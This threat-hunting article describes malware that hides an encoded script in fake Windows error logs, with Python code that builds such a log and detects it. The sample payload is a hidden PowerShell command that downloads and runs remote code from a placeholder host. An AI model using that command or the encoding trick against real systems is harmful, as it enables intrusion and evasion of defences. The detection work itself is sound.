Threat Hunting Content: Malicious Payload in Fake Windows Error Logs

Last week, security researchers discovered a curious way of hiding a malicious payload in plain sight, and the method is actively used in the wild. Adversaries use fake error logs to store ASCII characters disguised as decimal values; read back in order, the values decode to a malicious payload designed to prepare the ground for script-based attacks.

In the discovered scenario, the attackers applied the new method only after they had already compromised the systems and achieved persistence. They used a file with a .chk extension that imitated a Windows application error log. At first glance the file is not suspicious: it contains timestamps and references to an internal Windows version number, but each line ends with the decimal representation of a single ASCII character. Such a file does not raise suspicion from security solutions, and a user would consider it legitimate, yet this fake error log hides an encoded script that contacts the command-and-control server for the next step of the attack. The script is run by a scheduled task and two renamed, legitimate Windows binaries: mshta.exe and powershell.exe. The attackers use it to collect details about installed browsers, security products, and point-of-sale software. An exclusive threat hunting rule developed by Osman Demir helps security solutions find fake Windows error logs containing malicious payloads.
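To make the encoding concrete, here is an added example (written for this page, not code from the original report or from the rule's author) that builds a constructed fake .chk log in the style described above and then applies the two checks a hunter would run over a suspect file: does almost every line end in a small decimal number, and does the sequence of those numbers decode to printable text that looks like a script? The log format, the sample payload, the thresholds (`min_ratio`, `min_lines`) and the `SCRIPT_MARKERS` list are all assumptions chosen for the example, not values from the report or the rule.

```python
import re
from typing import Optional, Tuple

# Matches a 1-3 digit decimal number that is the last whitespace-separated
# token on the line (ASCII code points fit in at most three digits).
TRAILING_NUM = re.compile(r"(?:^|\s)(\d{1,3})\s*$")

# Constructed sample payload for the demonstration (assumption, not from the report).
PAYLOAD = ('powershell -nop -w hidden -c "IEX((New-Object Net.WebClient)'
           ".DownloadString('http://example.invalid/a'))\"")


def build_fake_log(payload: str) -> str:
    """Encode a payload the way the fake error log does: one plausible-looking
    log line per character, with the character's decimal ASCII code at the end.
    Format is an assumption made for this example."""
    lines = ["=== app.exe Application Error Log ==="]  # header without a trailing number
    for i, ch in enumerate(payload):
        lines.append(f"2020-05-{(i % 28) + 1:02d} 10:{i % 60:02d}:00 Error 0x80004005 "
                     f"app.exe build 10.0.18363.815 {ord(ch)}")
    return "\n".join(lines)


def trailing_decimal(line: str) -> Optional[int]:
    """Return the trailing decimal token of a line, or None if there is none."""
    m = TRAILING_NUM.search(line)
    return int(m.group(1)) if m else None


def decode_trailing_values(text: str) -> Tuple[str, int, int]:
    """Decode the trailing numbers of every line as ASCII.
    Returns (decoded_text, lines_with_trailing_number, non_empty_lines).
    Non-printable or out-of-range values become U+FFFD so they can be counted."""
    decoded = []
    total = hits = 0
    for line in text.splitlines():
        if not line.strip():
            continue
        total += 1
        n = trailing_decimal(line)
        if n is None:
            continue
        hits += 1
        decoded.append(chr(n) if 32 <= n <= 126 or n in (9, 10, 13) else "\ufffd")
    return "".join(decoded), hits, total


# Tokens that suggest the decoded text is a script rather than noise (assumption).
SCRIPT_MARKERS = ("powershell", "mshta", "iex", "invoke-", "http", "cmd /c",
                  "vbscript", "$", "||", "&&")


def is_suspicious(text: str, min_ratio: float = 0.9, min_lines: int = 10) -> Tuple[bool, str]:
    """Flag a log whose lines almost all end in a decimal number AND whose decoded
    characters are printable text containing script-like markers.
    Real logs often end lines with numbers (status codes, counters), so the
    first check alone is not enough; the decoded content must also look like code."""
    decoded, hits, total = decode_trailing_values(text)
    if total < min_lines or hits / total < min_ratio:
        return False, decoded
    printable = sum(c != "\ufffd" for c in decoded) / max(len(decoded), 1)
    marker_hit = any(m in decoded.lower() for m in SCRIPT_MARKERS)
    return printable >= 0.95 and marker_hit, decoded


FAKE_LOG = build_fake_log(PAYLOAD)

# Constructed benign log: some lines end in numbers too, but they do not decode to a script.
BENIGN_LOG = """\
2020-05-11 08:00:01 Service started, build 10.0.18363.815
2020-05-11 08:00:05 Config loaded from C:\\ProgramData\\app\\app.cfg
2020-05-11 08:01:10 HTTP GET /api/status returned 500
2020-05-11 08:01:11 Retrying request, attempt 1
2020-05-11 08:01:13 Retrying request, attempt 2
2020-05-11 08:01:17 Retrying request, attempt 3
2020-05-11 08:01:18 Request failed after 3 attempts
2020-05-11 08:02:00 HTTP GET /api/status returned 404
2020-05-11 08:02:30 Cache flushed, 1280 entries removed
2020-05-11 08:03:00 Scheduled task completed
2020-05-11 08:05:00 Memory usage 71
2020-05-11 08:10:00 Service stopped
"""

if __name__ == "__main__":
    for name, log in (("fake.chk", FAKE_LOG), ("benign.log", BENIGN_LOG)):
        flagged, decoded = is_suspicious(log)
        print(f"{name}: suspicious={flagged}")
        if flagged:
            print("  decoded payload:", decoded)
```

The second check matters in practice: a real application log with status codes or retry counters at line ends will pass the "ratio of lines ending in a number" test, but its trailing values are either out of the printable ASCII range or decode to gibberish, so the decoded-content check keeps it out of the alert queue. A hunt that only looks for the file extension or the numeric suffix would be noisy; combining it with the process context the report describes (a scheduled task launching renamed mshta.exe and powershell.exe) gives a far higher-confidence detection.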

The rule has translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, ELK Stack, RSA NetWitness, Sumo Logic, Graylog, Humio, LogPoint

EDR: Carbon Black, Elastic Endpoint


Tactics: Defense Evasion

Techniques: Masquerading (T1036)